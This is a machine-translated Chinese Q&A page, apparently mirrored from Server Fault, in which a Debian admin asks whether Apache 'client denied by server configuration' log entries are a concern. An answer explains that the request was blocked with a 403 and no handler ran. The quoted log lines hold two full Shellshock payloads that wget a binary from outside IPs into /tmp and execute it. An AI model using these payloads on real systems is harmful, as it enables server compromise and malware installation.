服务器 Gind.cn
  1. 服务器 Gind.cn
  3. 我应该担心服务器configuration拒绝的客户端请求,Apache日志
Intereting Posts
每个networking的最大主机数量 托pipeRuby on Rails应用程序 broadcast.addr。 在rDNS? 跟踪NFS活动 Spamassasin / Mailscanner – “学习更好” 用于Windows的安全磁盘擦除工具 在Ubuntu 10.04上安装communote 我如何在EC2亚马逊Debain上运行apache2? 我需要将安装在一个HP-UX系统上的软件包复制到testing系统 在Ubuntu 10.0.4上的openldap服务器 如何让我的docker集装箱运行? 没有启动屏幕,服务器是非常嘈杂 你可以在防火墙后面使用configurationpipe理(Puppet / Chef)吗? 在将运行configuration恢复到replaceCisco路由器后,SSH不起作用 使用FreeTDS连接到MS SQL Server:错误20002:“Adaptive Server连接失败”

我应该担心服务器configuration拒绝的客户端请求,Apache日志

我有一个服务器与debian 7.我正在检查Apache的错误日志文件,看到这样的几行 

[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh" [Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

我可能会误解,但是由于这个部分() { :; }; () { :; }; 我想有人试图使用shellshock错误。

但是,不pipe这是否是shellshock,问题是 – 如果我在带有消息的日志中有行 

 client denied by server configuration

这是我应该担心的水平,还是因为请求被拒绝,我可以忽略它 – 确保没有恶意脚本被下载/执行?

“被服务器configuration拒绝的客户端”意味着该请求被Require指令 (或者在旧版本的Apache, Allow / Deny指令 ), 重写规则或者其他Apache模块阻塞。 特别是这意味着请求从来没有传递给外部处理程序,所以漏洞无法运行。 客户刚刚服务了403 Forbidden错误。